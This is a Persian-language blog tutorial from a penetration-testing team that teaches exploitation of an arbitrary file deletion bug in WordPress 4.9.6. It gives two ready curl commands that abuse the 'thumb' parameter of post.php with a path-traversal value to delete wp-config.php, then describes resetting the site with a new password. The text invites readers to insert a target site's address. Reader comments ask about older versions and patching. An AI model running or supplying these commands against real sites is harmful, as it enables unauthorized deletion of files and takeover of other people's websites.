اکسپلویت وردپرس 4.9.6 به منظور حذف فایل

اکسپلویت وردپرس

اکسپلویت وردپرس | معرفی اسیب پذیری جدید وردپرس برای حذف فایل های حساس و ریست وردپرس و همچنین امکان دسترسی های دیگر
در ادامه این پست اموزشی با ما همراه باشید و نحوه استفاده از این اسیب پذیری را بیاموزید

اکسپلویت وردپرس 4.9.6

توضیحات درباره وردپرس و اکسپلویت وردپرس

وردپرس یک سیستم مدیرت محتوا بسیار محبوب و پر استفاده در دنیای اینترنت میباشد که این امکان را میدهد در کمتر از 5 دقیقه وبلاگ خود را راه اندازی کنید
به همین دلیل کاربران بسیاری را به سمت خود جذب کرده است و حجم زیادی از سایت های دنیا بر پایه این سیستم مدریت محتوا میباشند
در این پست اموزشی حفره امنیتی جدید وردپرس را معرفی میکنیم و توضیحات کاملی درباره ان خواهیم داد
 

اکسپلویت وردپرس

در نسخه جدید وردپرس ورژن 4.9.6 اسب پذیری مهمی کشف شد و داخل سایت های ثبت اکسپلویت ان را مشاهده میکنیم
این اسیب پذیری این امکان را به نفوذگر میدهد که فایل های درون دایرکتوری سرور را حذف نماید که این میتواند مشکلات بسیاری را رقم بزند
به طور مثال فایل config وردپرس یکی از مهم ترین فایل های ان میباشد که درصورتی که حذف شود
امکان ریست وردپرس به شخص داده میشود و میتوانید سیستم را از نو با پسود جدید راه اندازی کند
اکسپلویت وردپرس 4.9.6 به منظور حذف فایل

نحوه استفاده و اموزش هک

این باگ در برگه post.php وردپرس و ورودی thumb که برای ادرس فایل ها میباشد کشف شده است و
پس برای استفاده از اکسپلویت وردپرس به صورت دستی ان باید یک دسترسی سطح پایین داشت مانند نویسنده
در قسمت رسانه ها یک تصویر جدید اپلود میکنیم و در قسمت تغیرات وارد میشویم 
در اینجا وارد لینوکس خود شوید و دقت کنید سرویس curl نصب باشد 
بعد از ان همانند دستور زیر فایل مورد نظر خود را حذف کنید

curl -v 'http://site.com/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'

ادرس سایت مورد نظر خود را در قسمت site وارد کنید و در اخر هم صحفه مورد نظر مانند Config.php را میتوانید برای حذف انتخاب کنید
حال صفجه مورد نظر انتخاب شده است و برای حذف ان مانند دستور زیر انجام میدهیم

curl -v 'http://site.com/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'

بعد از اجرای دستور بالا اکسپلویت شما با موفقیت عمل میکنید
 

  معرفی جدید ترین اکسپلویت ها در برترین سایت ها

ویدیو اموزشی برای اکسپلویت وردپرس

لینک اکسپلویت اسیب پذیری وردپرس


0/5 (0 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور و مدرس دوره های تست نفوذ و امنیت ، در 5 سال گذشته متمرکز بر مباحث روز هک و امنیت بوده ام و بعد از کسب دانش و تجربه های ارزشمند تصمیم بر به اشتراک گذاری نتیجه ان ها با دیگران گرفته ام.

مطالب مرتبط

داده کاوی

Data Mining (داده کاوی) چیست؟

در این اموزش با دیتا ماینینگ یا داده کاوی به صورت کامل اشنا خواهید شد با ما در ادامه این اموزش همراه باشید. 0/5 (0 نظر)   اکسپلویت 0day چیست ؟ + اکسپلویت نویسی

ابزار SSLScan

ابزار SSLScan و برسی SSL وب سایت

در این آموزش به ابزار SSLScan جهت بررسی امنیتی SSL وب سایت ها می پردازیم، در ادامه در ادامه این آموزش با ما همراه باشید. 0/5 (0 نظر)   ایجاد بکدور در وبسایت هک شده

۲ دیدگاه در “اکسپلویت وردپرس 4.9.6 به منظور حذف فایل”

  • shamsi_zadeh مرداد ۱۶, ۱۳۹۹ پاسخ

    آیا روی نسخه های قدیمی تر از ۴.۹.۶ مثل ۴.۸.۷ هم کار می کنه یا فقط برای این نسخه است ؟ آیا امکان وجود داره سایتی بدون آپدیت هسته وردپرسی خودش به صورت دستی این آسیب پذیری رو رفع کنه؟ در ضمن لینک آخر آموزش کار نمی کنه.

    • نیما حسینی مرداد ۲۶, ۱۳۹۹ پاسخ

      درود
      در نسخه های قدیمی تر هم این آسیب پذیری ممکن است وجود داشته باشد.
      بله ممکن است که آسیب پذیر به صورت دستی رفع شده باشد ولی احتمال این کار بسیار پایین است و اغلب وردپرس را آپدیت می کنند.
      مرسی از اطلاع رسانی شما لینک تصحیح شد.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *